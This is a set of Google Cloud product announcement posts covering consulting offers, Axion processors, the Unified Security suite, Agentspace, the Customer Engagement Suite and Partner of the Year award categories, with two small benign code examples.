We’re also expanding access to Delivery Navigator, a platform that offers a wide range of resources for teams working on cloud-based projects, including project plan templates, technical instructions, predictive insights, and smart recommendations.
And finally, to demonstrate the proven business impact of our work, we’re excited to showcase a pair of significant projects our team has completed with industry leaders: Airbus and Broadcom.
Accelerate your transformation: new service offerings
To accelerate our customers’ digital transformations and streamline technology adoption, we’re introducing three new pre-packaged service offerings. These tailored offers provide a clear and proven path that can lead enterprises from concept to deployment, enabling them to rapidly adopt our technologies and avoid costly missteps. Each offering can be customized to meet your unique needs, ensuring an efficient and effective technology implementation journey.
New offers available this week:
Agentspace Accelerator provides a structured approach to connecting and deploying AI-powered search within organizations, so employees can easily access relevant internal information and resources when they need them. As part of this service offer, our team of experts facilitates the secure integration of enterprise data with Gemini’s advanced reasoning and Google-quality search, along with customizable add-ons for cloud setup, data preparation, and strategic enablement. The Agentspace Accelerator offering is the stepping stone for organizations to create their own AI-powered agents, agentic workflows, and more within a single unified platform.
Optimize with TPUs helps customers migrate workloads to TPUs, our purpose-built AI chips, so they can get more performance from their AI inference and training spend. TPUs are designed to scale cost-efficiently across a variety of use cases, including chatbots, code generation, media content creation, synthetic speech, personalization models, and recommendation engines. Through a six-week engagement, Google Cloud experts will develop a custom backend wrapper around your existing AI infrastructure, enabling you to easily shift workloads to TPUs while maintaining the flexibility to toggle to other chips as needed (a generic sketch of this toggle pattern follows this list).
Oracle on Google Cloud empowers customers to fully leverage the benefits of our partnership with Oracle, combining Oracle databases and applications with Google Cloud’s advanced platform and AI capabilities for enhanced database and network performance. Through a tailored engagement, Google Cloud experts will assist in deploying and optimizing Oracle through a variety of modalities, such as bring-your-own-licenses with Google Kubernetes Engine or Oracle Cloud Infrastructure with Google Cross-Cloud Interconnect. This offering enables customers to improve database and network speed, while gaining streamlined access to Google Cloud’s AI and data tools to help simplify the creation of AI-powered applications.
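To give a flavor of the toggle pattern described in the Optimize with TPUs offer above, here is a generic JAX sketch, not the actual consulting deliverable: one code path whose accelerator backend is chosen by configuration.

```python
# Generic sketch: the same jitted workload targeting TPU, GPU, or CPU,
# selected by an environment variable rather than code changes.
import os
import jax
import jax.numpy as jnp

BACKEND = os.environ.get("ACCEL_BACKEND", "cpu")  # set to "tpu" on TPU VMs
device = jax.devices(BACKEND)[0]

@jax.jit
def predict(weights, features):
    # Stand-in for a real model's forward pass.
    return jnp.dot(features, weights)

weights = jax.device_put(jnp.ones((128, 10)), device)
features = jax.device_put(jnp.ones((4, 128)), device)
print(predict(weights, features).shape)  # (4, 10)
```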
Next up: The AI-enhanced Delivery Navigator platform
To further empower our customers’ cloud journeys, we’re excited to expand access to Delivery Navigator, a platform designed to bring efficiency and confidence to Google Cloud projects. Currently, our partners and consulting teams use Delivery Navigator to access proven delivery methodologies and best practices that help them guide migrations and technology implementations efficiently and safely.
Starting in October, we will begin to roll out Delivery Navigator to customers as well, available in preview. This means participating customers will have direct access to the same frameworks, tooling, tips, and best practices used by Google Cloud’s own teams.
Built around a conversational AI-chat interface, Delivery Navigator offers a wide range of resources for teams working on cloud-based projects, including project plan templates, detailed technical instructions with example code, and predictive insights and smart recommendations to help teams proactively address technical challenges. It covers many of the common variables encountered during solution implementation, as well as rarer hurdles, and there’s plenty of guidance on how to optimize Google Cloud deployments and accelerate time-to-value.
By providing access to the same advanced frameworks and AI enhancements used by our own experts, Delivery Navigator enables a smoother, faster, and more successful path to realizing the full value of Google Cloud.
Bringing cloud and AI projects to life
Customers are already achieving remarkable outcomes with the support of Google Cloud Consulting experts and our partner ecosystem, and this week, we’re excited to share our work with enterprise customers like Airbus and Broadcom. While each customer’s needs differ, the common theme is that Google Cloud Consulting is helping enterprises implement Google Cloud technology and migrate workloads within complex IT environments – and doing so safely and securely.
Airbus has streamlined its IT landscape in Canada through a strategic migration, undertaken in a post-merger integration context, from on-premises servers to Google Cloud. The transformation gives Airbus enhanced visibility into, and ownership of, its complex IT infrastructure in Canada, and has enabled the company to modernize more than 500 systems.
Leveraging robust infrastructure and migration tools, Airbus completed a rapid, seamless migration of 2.5 petabytes of data on schedule. The revamped tech stack helps Airbus support increased production rates in Canada and contributes to strengthening airline trust.
Broadcom is driving its digital transformation by optimizing its compute and data landscape through a strategic VMware migration to Google Cloud — and boosting employee efficiency with the deployment of Gemini Code Assist.
Broadcom engaged a group of experts from Google Cloud Consulting to efficiently migrate twelve SaaS products, including their data infrastructures, while maintaining zero downtime. This unified data environment empowers Broadcom to access and analyze data with greater efficiency, leading to deeper product insights and enhanced customer experiences.
Furthermore, Broadcom is rolling out Gemini Code Assist to their employees, through a robust enablement program led by Google Cloud Consulting that features hands-on training, accessible office hours, and ongoing chat support.
Building the future together
At Google Cloud Consulting, we’re passionate about empowering businesses to thrive in the cloud and AI era. We’re committed to guiding customers every step of the way, from initial planning and implementation to ongoing optimization. Contact us today to discover how we can help you achieve your business objectives in this new era of technology.
Last year we announced Google Axion processors, our first custom Arm®-based CPUs. We built Axion to address our customers’ need for general-purpose processors that maximize performance, reduce infrastructure costs, and help them meet their sustainability goals.
Since then, Axion has shaken up the market for cloud compute. Customers love its price-performance — up to 65% better than current-generation x86 instances. It even outperforms leading Arm-based alternatives by up to 10%. Axion C4A instances were also the first virtual machines to feature new Google Titanium SSDs, with up to 6TB of high-performance local storage, up to 2.4M random read IOPS, up to 10.4 GiB/s of read throughput, and up to 35% lower access latency compared to previous-generation SSDs. In fact, in the months since launch, over 40% of Compute Engine’s top 100 customers have adopted Axion, thousands of Google’s internal applications now run on Axion, and we continue to expand integration of C4A and Axion with our most popular Google Cloud products and partner solutions.
Today, we are excited to share that Cloud SQL and AlloyDB for PostgreSQL managed databases are available in preview on C4A virtual machines, providing significant price-performance advantages for database workloads. To take advantage of Axion processors today, you can choose to host your database on a C4A VM directly from within the console.
Supercharging database workloads
Organizations with business-critical database workloads need high-performance, cost-efficient, available, and scalable infrastructure. However, surging data growth alongside higher and more complex processing requirements is creating challenges.
C4A instances bring significant advantages to managed Google Cloud database workloads: improved price-performance compared to x86 instances, translating to more cost-effective database operations. Designed to handle data-intensive workloads requiring real-time processing, C4A is well-suited for high-performance databases and analytics engines.
When running on C4A instances, AlloyDB and Cloud SQL provide nearly 50% better price-performance than N series VMs for transactional workloads, and up to 2x better throughput than Amazon’s equivalent Graviton 4 offerings.
“At Mercari, we deploy thousands of Cloud SQL instances across engines and editions to meet our diverse database workload requirements. At our scale, it is critical to optimize our fleet to run more efficiently. We are excited to see the price-performance improvements on the new Axion-based C4A machine series for Cloud SQL. We look forward to adopting C4A instances in our MySQL and PostgreSQL fleet and taking advantage of the C4A’s high-performance while at the same time reducing our operational costs.” – Takashi Honda, Database Reliability Engineer, Mercari
We’ve also expanded regional availability for Axion and C4A. C4A is now broadly available across 10 Google Cloud regions, expanding to 15 in the coming months. Cloud SQL and AlloyDB on Axion are now available in eight regions, with more to be added before the end of the year.
Google’s internal fleet and top customers choose Axion
Given its price-performance, it’s no surprise that in less than a year, Axion is a popular choice for Google internal applications and top Compute Engine customers, including Spotify:
“As the world’s most popular audio streaming subscription service, reaching over 675 million users, Spotify demands exceptional performance and efficiency. We are in the process of migrating our entire compute infrastructure to Axion and this is yielding remarkable results. We’re witnessing a staggering 250% performance increase, significantly enhancing the user experience, as much as 40% reduction in compute costs, and a drastic reduction in compute management toil, allowing us to reinvest in further innovation and growth.” – Dave Zolotusky, Principal Engineer, Spotify
And we’re only just getting started. We’re also making it easier for Google Cloud customers to benefit from Axion’s price-performance without having to refactor their applications. Google Cloud customers can already use C4A VMs in Compute Engine, Google Kubernetes Engine (GKE), Batch, Dataproc, Dataflow, and more services.
Expanding the Axion and Arm ISV ecosystem
Axion processors are delivering undeniable value for customers and ISVs looking for security, efficiency and competitive price-performance for data processing. We’re pleased to report that ClickHouse, Databricks, Elastic, MongoDB, Palo Alto Networks, Redis Labs, and Starburst have all chosen Axion to power their data processing products — with support from many more ISVs on the way. This commitment is notable as ISVs often choose Axion over alternative processors, including Arm-based processors from other cloud providers.
Enhancing diverse ML inference workloads
Machine learning (ML) inference workloads span traditional embedding models to modern generative AI applications, each with unique price-performance needs that defy a one-size-fits-all approach. The range of inference tasks, from low-latency real-time predictions to high-throughput batch processing, necessitates infrastructure designed for specific workload requirements.
Google’s Axion C4A VMs deliver exceptional performance for ML workloads through architectural strengths like the Arm Neoverse V2 compute cores, with high single-threaded performance and per-core memory bandwidth for predictable, high-throughput execution, and Google’s Titanium offload system technology for reduced overhead. With up to 72 vCPUs, 576 GB of DDR5 memory, and advanced SIMD processing capabilities, Axion C4A excels at matrix-heavy inference tasks. Combined with its ready availability, operational familiarity, and up to 60% better energy efficiency compared to x86 alternatives, Axion offers a compelling CPU-based ML inference platform alongside GPUs and TPUs.
In particular, Axion is well-suited for real-time serving of recommendation systems, NLP, threat detection, and image recognition models. As large language models (LLMs) with lower parameter counts (3-8B) grow increasingly capable, Axion can also be a viable platform for serving these models efficiently.
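As a hedged sketch of that kind of CPU-serving workload, the snippet below runs a small open-weights model on CPU with Hugging Face Transformers; the model ID is a placeholder for any similarly sized model, and nothing here is Axion-specific beyond running well on capable CPUs.

```python
# Sketch: CPU inference for a small (3-8B-class) language model.
from transformers import pipeline

generator = pipeline(
    "text-generation",
    model="Qwen/Qwen2.5-3B-Instruct",  # placeholder small open model
    device=-1,  # -1 runs the pipeline on CPU
)
prompt = "Classify this DNS query as benign or suspicious: x9f3-qz.example."
print(generator(prompt, max_new_tokens=32)[0]["generated_text"])
```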
Customers have recognized this strength and are actively deploying ML inference workloads on C4A VMs to capitalize on its blend of performance, cost-effectiveness, and scalability, proving it a worthy complement to GPU-centric strategies. Palo Alto Networks uses C4A as part of its diversified ML infrastructure strategy and realized an 85% improvement in TCO efficiency by migrating its threat detection inference application from L4 GPUs to C4A.
“By migrating to Axion on Google Cloud, our testing shows that DNS Security will see an 85% improvement in price-performance, a 2X decrease in latency for DNS queries, and an 85% cost savings compared to instances with mid-range GPUs, enhancing our ML-powered DGA detections for customers.” – Fan Fei, Director of Engineering, Palo Alto Networks
Learn more about Axion-based C4A virtual machines
In their quest to balance performance, efficiency, and cost, more and more organizations are turning to the Arm architecture. Axion’s strong price-performance, combined with a growing ecosystem of support for mission-critical workloads, makes it a compelling choice. We’ve seen incredible excitement for Axion-based C4A virtual machines from our customers and partners, and we can’t wait to see what you can build with Axion, too. Try Cloud SQL and AlloyDB running on C4A virtual machines today.
Today at Google Cloud Next, we are announcing Google Unified Security, new security agents, and innovations across our security portfolio designed to deliver stronger security outcomes and enable every organization to make Google a part of their security team.
Introducing Google Unified Security
Enterprise infrastructure continues to grow in size and complexity, expanding the attack surface, and making defenders’ jobs increasingly difficult. Separate, disconnected security tools result in fragmented data without relevant context, leaving organizations vulnerable and reactive in the face of escalating threats. Security teams operate in silos, slowed by toilsome workflows, making it hard to accurately assess and improve the organization’s overall risk profile.
To address this challenge, we are bringing together our best-in-class security products for threat intelligence, security operations, cloud security, and secure enterprise browsing, along with Mandiant expertise, into a converged security solution powered by AI: Google Unified Security.
Now generally available, Google Unified Security lays the foundation for superior security outcomes. It creates a single, scalable, searchable security data fabric across the entire attack surface, and provides visibility, detection, and response capabilities across networks, endpoints, clouds, and apps. It automatically enriches security data with the latest Google Threat Intelligence for more effective detection and prioritization. Crucially, Google Unified Security makes every aspect of the practitioner experience more efficient with Gemini.
“Google Unified Security represents a step forward in achieving better security outcomes with the integration of browser behavior, managed threat hunting, and security validation to strategically eliminate coverage gaps and simplify security management and threat detection and response. This approach offers organizations a more holistic and streamlined defense against today’s complex threat landscape,” said Michelle Abraham, senior research director, Security and Trust, IDC.
At the heart of Google Unified Security’s capabilities lie its integrated product experiences, exemplified by:
Browser telemetry and asset context from Chrome Enterprise integrated into Google Security Operations to power threat detections and remediation actions.
Google Threat Intelligence integrated with security validation to proactively understand exposures and test security controls against the latest observed threat actor activity.
Cloud risks and exposures from Security Command Center, including those impacting AI workloads, enriched with integrated Google Threat Intelligence to more effectively threat hunt and triage incidents.
Infused with new semi-autonomous AI capabilities, these integrated products provide preemptive security, enabling organizations to anticipate threats and remediate risks before attackers can act to cause business damage or loss.
“I see Google and its security suite as one of the top partnerships that I have within my organization. The value they bring, the expertise and the knowledge, the willingness to play with us to explore new opportunities and to look at new areas — it makes them a true partner and someone that we’re very happy to be working together with,” said Craig McEwen, deputy CISO, Unilever.
“Accenture and Google Cloud partner to help clients achieve the cyber resilience their businesses need to stay ahead of today’s threats. By integrating advanced threat intelligence, comprehensive visibility and AI assistance, we can help organizations shift from reactive to proactive and agile responses,” said Paolo Dal Cin, global lead, Accenture Security. “This unified approach, powered by Google Unified Security, can help us deliver a new standard of cyber resilience with greater scale, speed and effectiveness.”
“Deloitte Cyber and Google Cloud are working closely together to secure the modern enterprise – which includes using the leading capabilities from both Deloitte and Google to protect data, users, and applications. Google Unified Security brings together a centralized data fabric, integrated threat intelligence, unified SOC and cloud workflows, and agentic AI automation — creating a powerful platform to drive our clients’ security transformation,” said Adnan Amjad, principal, U.S. cyber leader, Deloitte & Touche LLP.
Security agents and Gemini
Agentic AI is powering a fundamental shift in how security operations are conducted. Our vision is a future where intelligent agents work alongside human analysts, offloading routine tasks, augmenting their decision-making, and freeing them to focus on complex issues. Today we’re introducing the following new Gemini in Security agents:
In Google Security Operations, an alert triage agent performs dynamic investigations on behalf of users. Expected to preview for select customers in Q2 2025, this agent analyzes the context of each alert, gathers relevant information, and renders a verdict on the alert, along with a history of the agent’s evidence and decision making. This always-on investigation agent will vastly reduce the manual workload of Tier 1 and Tier 2 analysts who would otherwise triage and investigate hundreds of alerts per day.
In Google Threat Intelligence, a malware analysis agent investigates whether code is safe or harmful. Expected to preview for select customers in Q2 2025, this agent analyzes potentially malicious code, including the ability to create and execute scripts for deobfuscation. Ultimately, the agent summarizes its work and provides a final verdict.
These agentic AI advancements aim to deliver faster detection and response, with complete visibility and streamlined workflows. They represent a catalyst for security teams to reduce toil, build true cyber-resilience, and drive strategic program transformation.
What’s new in Google Security Operations
New data pipeline management capabilities, now generally available, can help customers better manage scale, reduce costs, and satisfy compliance mandates. Through our expanded partnership with Bindplane, you can now transform and prepare data for downstream use; route data to different destinations and multiple tenants to manage scale; filter data to control volume; and redact sensitive data for compliance.
The new Mandiant Threat Defense service for Google Security Operations, now generally available, provides comprehensive active threat detection, hunting, and response. Mandiant experts work alongside customer security teams, using AI-assisted threat hunting techniques to identify and respond to threats, conduct investigations, and scale response through security operations SOAR playbooks, effectively extending customer security teams.
What’s new in Security Command Center
We recently announced AI Protection capabilities for managing risk across the AI lifecycle for Google Cloud customers. AI Protection helps discover AI inventory, secure AI models and data, and detect and respond to threats targeting AI systems.
Model Armor, which is generally available and part of AI Protection, allows you to apply content safety and security controls to prompts and responses for a broad range of models across multiple clouds. Model Armor is now integrated directly with Vertex AI so developers can automatically route prompts and responses for protection without any changes to applications.
New Data Security Posture Management (DSPM) capabilities, coming to preview in June, can enable discovery, security, governance, and monitoring of sensitive data including AI training data. DSPM can help discover and classify sensitive data, apply data security and compliance controls, monitor for violations, and enforce access, flow, retention, and protection directly in Google Cloud data analytics and AI products.
A new Compliance Manager, launching in preview at the end of June, will combine policy definition, control configuration, enforcement, monitoring, and audit into a unified workflow. It builds on the configuration of infrastructure controls delivered using Assured Workloads, providing Google Cloud customers with an end-to-end view of their compliance state, making it easier to monitor, report, and prove compliance to auditors with Audit Manager.
Other Security Command Center enhancements include:
Integration with Snyk’s developer security platform, in preview, to help teams find and fix software vulnerabilities faster.
New Security Risk dashboards for Google Compute Engine and Google Kubernetes Engine, generally available, which deliver insights into top security findings, vulnerabilities, and open issues directly in the product consoles.
We are also expanding our Risk Protection Program, which provides discounted cyber-insurance coverage based on cloud security posture. We’re thrilled to welcome Beazley and Chubb, two of the world’s largest cyber-insurers, as new program partners to expand customer choice and broaden international coverage.
As part of the program, our partners provide affirmative AI insurance coverage, exclusively for Google Cloud customers and workloads. Chubb will also offer coverage for risks resulting from quantum exploits, proactively helping to address the risk of quantum computing attacks.
What’s new in Chrome Enterprise
New employee phishing protections in Chrome Enterprise Premium use Google Safe Browsing data to help protect employees against lookalike sites and portals attempting to capture credentials. Organizations can now configure and add their own branding and corporate assets to help identify phishing attempts disguised on internal domains.
Organizations continue to benefit from the simple and effective data protections in Chrome. In addition to watermarking and screenshot blocking, and controls for copy, paste, upload, download, and printing, Chrome Enterprise Premium data masking is now generally available. We’re also extending key enterprise browsing protections to Android, including copy and paste controls, and URL filtering.
What’s new in Mandiant Cybersecurity Consulting
The Mandiant Retainer provides on-demand access to Mandiant experts with pre-negotiated terms and two-hour incident response times. Customers now have additional flexibility to redeem pre-paid funds for investigations, education, and intelligence to boost their expertise and resilience.
Mandiant Consulting is also partnering with Rubrik and Cohesity to create a solution to minimize downtime and recovery costs after a cyberattack. Together, Mandiant consultants and our data backup and recovery partners can help customers establish, test, and validate a cloud-isolated recovery environment (CIRE) for critical applications on Google Cloud, and deliver incident response services in the event of a compromise.
What’s new for Trusted Cloud
We continue regular delivery of new security controls and capabilities on our cloud platform to help organizations meet evolving policy, compliance, and business objectives. Today we’re announcing the following updates:
For Sovereign Cloud:
Google Cloud has brought to market the industry’s broadest portfolio of sovereign cloud solutions, providing customers with choice to meet the unique and evolving requirements for data, operational, and software sovereignty. Google Cloud offers Regional and Sovereign Controls across 32 regions in 14 countries. We also offer Google Cloud Sovereign AI services in our public cloud, sovereign cloud, and distributed clouds, as well as with Google Workspace.
We’ve partnered with Thales to launch the S3NS Trusted Cloud, now in preview, designed to meet France’s highest level of cloud certification, the SecNumCloud standard defined by the National Cyber Agency (ANSSI). It is the first sovereign cloud offering based on the Google Cloud platform that is operated, majority-owned, and fully controlled by a European organization.
For Identity and Access Management:
Unified access policies, coming to preview in Q2, create a single definition for IAM allow and IAM deny policies, enabling you to more consistently apply fine-grained access controls.
We’re also expanding our Confidential Computing offerings. Confidential GKE Nodes with AMD SEV-SNP and Intel TDX will be generally available in Q2, requiring no code changes to secure your standard GKE workloads. Confidential GKE Nodes with NVIDIA H100 GPUs on the A3 machine series will be in preview in Q2, offering confidential GPU computing without code modifications.
Single-tenant Cloud Hardware Security Module (HSM), now in preview, provides dedicated, isolated HSM clusters managed by Google Cloud, while granting customers full administrative control.
For network security:
Network Security Integration allows enterprises to easily insert third-party network appliances and service deployments to protect Google Cloud workloads without altering routing policies or network architecture. Out-of-band integrations with ecosystem partners are generally available now, while in-band integrations are available in preview.
DNS Armor, powered by Infoblox Threat Defense, coming to preview later this year, uses multi-sourced threat intelligence and powerful AI/ML capabilities to detect DNS-based threats.
Cloud Armor Enterprise now includes hierarchical policies for centralized control and automatic protection of new projects, available in preview.
Cloud NGFW Enterprise supports L7 domain filtering capabilities to monitor and restrict egress web traffic to only approved destinations, coming to preview later this year.
Secure Web Proxy (SWP) now includes inline network data loss protection capabilities through integrations with Google’s Sensitive Data Protection and Symantec DLP using service extensions, available in preview.
Take the next step
These announcements just scratch the surface of the outcomes we can deliver when we converge our security capabilities and infuse them with AI and our frontline intelligence.
In today’s threat landscape, one of the most critical choices you need to make is who will be your strategic security partner, and Google Unified Security is the best, easiest, and fastest way to make Google part of your security team.
For more on our Next ‘25 announcements, you can watch our security spotlight, and check out the many great security breakout sessions at Next ‘25 — live and on-demand.
AI agents are a major leap from traditional automation or chatbots. They can execute complex workflows, from planning and research, to generating and testing novel ideas. But to scale, businesses need an AI-ready information ecosystem that can work across silos, easy ways to create and adopt agents, and enterprise-grade security and compliance.
That’s why we launched Google Agentspace in December. This product puts the latest Google foundation models, powerful agents, and actionable enterprise knowledge in the hands of employees. With Agentspace, employees and agents can find information from across their organization, synthesize and understand it with Gemini’s multimodal intelligence, and act on it with AI agents.
Since the launch, we have seen tremendous interest in Agentspace from leading organizations like Banco BV, Cohesity, Gordon Food Services, KPMG, Rubrik, Wells Fargo, and more.
We’re accelerating this momentum by expanding Agentspace, currently generally available via allowlist, to make creating and adopting agents simpler. Starting today, customers can:
Give employees access to Agentspace’s unified enterprise search, analysis, and synthesis capabilities, directly from the search box in Chrome
Discover and adopt agents quickly and easily with Agent Gallery, and create agents with our new no-code Agent Designer
Deploy Google-built agents such as our new Deep Research and Idea Generation agents to help employees generate and validate novel business ideas, synthesize dense information, and more
“We recently began our rollout of Google Agentspace to US employees at Gordon Food Service, with the goal of empowering them with greater access to our enterprise intelligence. This implementation has already started to transform how we access enterprise knowledge, wherever it is, as our searches are now grounded in our data across Google Workspace and other sources like ServiceNow. Employees are benefitting from easier access because they can search across multiple systems in one place, which translates to better decision-making and less legwork to discover information. Ultimately, Agentspace will enhance both our internal operations and product development, enabling us to serve our customers better.” – Matt Jansen, Manager of Emerging Technology, Gordon Food Service
Unified agentic search, directly from the search box in Chrome
Imagine being able to find any piece of information within the organization – whether that’s text, images, websites, audio, or video – with the ease and power of Google-quality search. That’s what we’re bringing to enterprises with Google’s AI-powered multimodal search capabilities in Agentspace, helping customers find what they need, regardless of how – and where – it’s stored. Whether the right information resides in common work apps like Google Workspace and Microsoft 365, apps like Jira, Salesforce, or ServiceNow, or in content from the web, Agentspace breaks down silos and understands organizational context. By building an enterprise knowledge graph for each customer — connecting employees with their team, documents they have created, software and data they can access, and more — it helps turn disjointed content into actionable knowledge.
Starting today in preview, Agentspace is integrated with Chrome Enterprise, letting employees leverage Agentspace’s unified search capabilities right from the search box in Chrome. Bringing Agentspace directly into Chrome will help employees easily and securely find information, including data and resources, right within their existing workflows.
Find data within your existing workflows directly from the search box in Chrome
Fast, simple agent adoption and creation
Google Agentspace provides employees – no matter their technical expertise – with access to specialized agents connected to various enterprise systems, so employees can integrate agents into their workflows and priorities with ease. We’re introducing two new features to help employees adopt and create agents for their specific needs:
Agent Gallery, generally available with allowlist, gives employees a single view of available agents across the enterprise, including those from Google, internal teams, and partners — making agents easy to discover and use. Customers can choose agents published by partners in Google Cloud Marketplace, then enable them in Agent Gallery, adding to our agent ecosystem and options for customers.
Agent Designer, in preview with allowlist, is a no-code interface for creating custom agents that connect to enterprise data sources and automate or enhance everyday knowledge work tasks. This helps employees – even those with limited technical experience – create agents suited to their individual workflows and needs. Thanks to deep integration between our products, Agent Designer complements the deeper, developer-first approaches available in Vertex AI Agent Builder, and agents built in Vertex AI Agent Builder can be published to Agentspace.
Powerful new expert agents: Idea Generation agent and Deep Research agent
As part of the Agent Gallery launch, two new Google-built expert agents will join the previously available NotebookLM for Enterprise:
Deep Research agent, generally available with allowlist, explores complex topics on the employee’s behalf, synthesizing information across internal and external sources into comprehensive, easy-to-read reports — all with a single prompt.
Idea Generation agent, available in preview with allowlist, helps employees innovate by autonomously developing novel ideas in any domain, then evaluating them to find the best solutions via a competitive system inspired by the scientific method.
Create a multi-agent innovation session with Idea Generation agent
Beyond expert agents, Agentspace supports the new open Agent2Agent (A2A) Protocol, which is designed to let agents across different ecosystems communicate with each other. As the first hyperscaler to drive this initiative for the industry, we believe this protocol will be critical to support multi-agent communication by giving agents a common language – regardless of the framework or vendor they are built on. This allows developers to choose the tools and frameworks that best suit their needs.
Enterprise-grade data protections and security
Agentspace was built on the same secure Google infrastructure trusted by billions of people. It is enterprise-ready, so as agents collaborate with employees and access corporate data, security, monitoring, and other essential requirements remain at the forefront.
It lets customers scan systems for sensitive information, such as PHI or PII data, or confidential elements, then choose whether to block these assets from agents and search. It also provides role-based access controls, encryption with customer-managed keys, data residency guarantees, and more.
We’re also growing the AI Agent Marketplace, a dedicated section within Google Cloud Marketplace. Customers can easily browse and purchase AI agents from partners such as Accenture, Deloitte, and more. Enterprise admins can make these agents available within Agentspace for added productivity and innovation. The growing variety of options lets each employee build and manage a team of agents to help them work — and we look forward to more innovation in the months to come.
Get started with Google Agentspace
As the ability to adopt and customize agents becomes more essential, we’re ready to take this journey with you — and excited to see what you accomplish with Agentspace.
Envision a future where every customer interaction is not only seamless and personalized, but delivers enduring experiences that build brand loyalty.
Today, AI agents are already transforming the ways businesses engage with customers — including advanced conversational agents. In fact, these conversational AI agents are enabling new levels of hyper-personalized, multimodal conversations with customers, improving customer interactions across all touchpoints.
And this is just the beginning.
While deploying AI for customer service is not entirely new, traditional deployments were limited in their ability to deliver personalized customer experiences at scale. Google Cloud’s Customer Engagement Suite was created to address these gaps through an end-to-end AI customer experience application that’s built with Google’s planet-scale capacity, performance, and quality. Customer Engagement Suite allows your customers to connect with your business across any channel — such as web, mobile, email, or voice — offering a consistent, personalized experience wherever they connect.
Recently we announced new AI-enabled capabilities to the four products within the Customer Engagement Suite — Conversational Agents, Agent Assist, Conversational Insights, and Google Cloud Contact Center-as-a-Service.
The Conversational Agents product helps customers build virtual agents that provide self-service experiences for customer service needs. Today we are unveiling a completely revamped and powerful new product for building and running generative and agentic conversational agents. This next-generation Conversational Agents product will enable teams to create highly interactive, enterprise-grade AI agents in just a few keystrokes.
The next generation of Conversational Agents
The leading capabilities provided by the next generation of the product include:
Simplifying how AI agents are built: Building AI agents has traditionally required specialized technical expertise. The next generation of Conversational Agents will use the latest Gemini models and Agent Development Kit, along with a comprehensive suite of enterprise-grade features such as privacy controls and AI observability. These power a no-code console that enables even non-technical employees to build complex conversational AI agents that deliver exceptional customer experiences in just a few clicks.
Enabling highly engaging customer experiences: The latest Gemini models enable human-like, high-definition voices; a higher degree of comprehension; and the ability to understand emotions — which all can help AI agents adapt during conversations. The product also supports streaming video, so the agents can interpret and respond to what they see in real-time when shared from customer devices.
Automating work across operations: Earlier, we introduced out-of-the-box connectors to provide easy integration with the most popular customer relationship management (CRM) systems, data sources, and business messaging platforms. With the next generation of Conversational Agents, enterprise users will have a variety of tools that let agents interact with their applications through API calls to perform specific tasks, such as looking up products, adding items to a cart, and checking out.
Over the last year, our portfolio of conversational AI agents and applications has helped companies enhance customer experiences and turn them into moments of brand loyalty, both within their customer service operations and beyond.
Verizon transforms customer experiences with Customer Engagement Suite
Verizon is transforming how it serves more than 115 million wireless connections with the help of Customer Engagement Suite. Human-assisted, AI-powered agents have helped customers with a range of day-to-day tasks, in stores and over the phone.
Verizon’s Personal Research Assistant provides the company’s 28,000 customer care representatives with the information they need to answer a customer’s question instantly, personalized to that customer’s unique needs. Able to answer 95% of questions, the Personal Research Assistant reduces cognitive load so care representatives can focus on the customer, leading to faster and more satisfying resolutions.
“At Verizon, we’re focused on transforming every customer interaction into a moment of genuine connection,” said Sampath Sowmyanarayan, chief executive officer, Verizon Consumer Group. “Google’s Customer Engagement Suite allows us to deliver faster, more personalized service, significantly reducing call times and empowering our team to focus on what truly matters: our customers. This human in the loop technology is not just about ease and simplicity; it’s about building lasting loyalty through exceptional experiences.”
Wendy’s and Mercedes-Benz deliver exceptional conversational experiences with vertical AI agents
We are also helping companies deliver great customer experiences beyond the contact center — meeting customers where they are, whether it’s in-store, in vehicles, or on personal devices like smartphones. We do this by providing readily deployable vertical AI agents that address specific real-world use cases.
These include the Food Ordering AI Agent, which delivers accurate, consistent, multilingual experiences, and the Automotive AI Agent, which offers deeply personalized, in-vehicle experiences.
Wendy’s is expanding their FreshAI deployment across 24 states. This drive-thru ordering system uses our Food Ordering AI Agent to handle 50,000 orders daily, in multiple languages, with a 95% success rate.
Mercedes-Benz is providing advanced conversational capabilities, including conversational search and navigation, in the new CLA series this year by integrating our Automotive AI Agent into its MBUX Virtual Assistant.
Take the next step
Read more about how organizations of all sizes across all industries are transforming customer experience with Customer Engagement Suite in this recent blog.
Watch the Google Cloud Next keynote and join us at the AI in Action showcase for a live demonstration of Conversational Agents.
Schedule a free consultation with Google’s AI specialists to identify specific use cases and applications that will help your organization deliver similar business impact results.
It’s an honor to announce the 2025 Google Cloud Partner of the Year winners!
It takes a lot to build great AI and cloud technology. Advancements and innovation come from collaboration, and Google Cloud has thousands of partners to make this happen. Among these, we’re excited to recognize dozens who take our work to the next level. These distinguished partners have demonstrated incredible dedication, innovation, and collaboration in delivering impactful solutions that drive success for our customers. Their contributions to the Google Cloud community are truly remarkable and deserve to be recognized.
Please join us in congratulating the winners in the following categories on their outstanding achievements.
Global
This award celebrates top global partners who exemplify excellence in their category, driving innovation and delivering industry-leading solutions with Google Cloud. With a customer-first approach, these partners have demonstrated outstanding leadership, impact, and commitment to transforming businesses worldwide.
Country
This award honors top partners who have demonstrated expertise in leveraging their services and solutions in their country or region to drive sales and deliver outstanding outcomes for Google Cloud customers.
Industry Solutions
Partners receiving this award have leveraged Google Cloud capabilities to create comprehensive and compelling solutions that made a significant impact in one or more industries across multiple regions.
Technology
This award recognizes partners who used a winning combination of Google Cloud technology in a specific technology segment to deliver innovative solutions and customer satisfaction.
Business Applications
Winners of this award have leveraged Google Cloud capabilities to create comprehensive and compelling technology solutions that made a significant impact in one industry across multiple regions.
Artificial Intelligence
This award recognizes partners who helped customers leverage generative AI in 2024 to achieve outstanding success through Google Cloud technology.
Data & Analytics
Partners receiving this award have expertly migrated or deployed new Google Cloud data analytics solutions to help customers extract actionable insights from their data, fueling business transformation.
Databases
This award recognizes partners who have successfully implemented and optimized Google Cloud’s database solutions, enabling their customers to manage data efficiently, securely, and at scale.
Google Workspace
This category honors partners who have excelled in driving sales and delivering outstanding services for Google Workspace, empowering customers with transformative solutions for collaboration and productivity.
Infrastructure Modernization
This award recognizes partners who have helped customers modernize their infrastructure by leveraging Google Cloud’s innovative solutions to increase agility, scalability, and cost-efficiency.
Public Sector
Winners of this award have provided exceptional service and enabled the success of their public sector customers by innovating, building, and delivering the right combination of solutions.
Security
This category honors partners who have effectively implemented Google Cloud’s security solutions, safeguarding their customers’ data and infrastructure from evolving threats.
Talent Development
Partners receiving this award have demonstrated a commitment to growing their team’s cloud skills through training, upskilling, and reskilling their workforce on leading-edge technology with Google Cloud certifications.
Training
Winners of this award have provided exceptional training services and enabled customer success by innovating, building, and delivering the right combination of Google Cloud solutions through learning.
Social Impact
